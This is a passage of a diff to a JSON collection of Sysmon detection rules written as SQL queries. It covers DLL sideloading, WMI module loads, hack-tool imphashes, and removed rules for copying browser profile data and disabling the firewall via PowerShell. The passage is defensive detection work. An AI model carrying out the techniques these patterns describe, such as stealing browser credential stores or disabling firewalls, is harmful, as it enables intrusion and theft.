This rule is better used in correlation with related activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "image_load_abusing_azure_browser_sso.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR 
CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - 
"attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "title": "WMI Modules Loaded", + "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects non wmiprvse loading WMI modules", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR Image LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR Image LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "image_load_wmi_module_load.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours 
related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', 
'3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 
'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR 
Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash 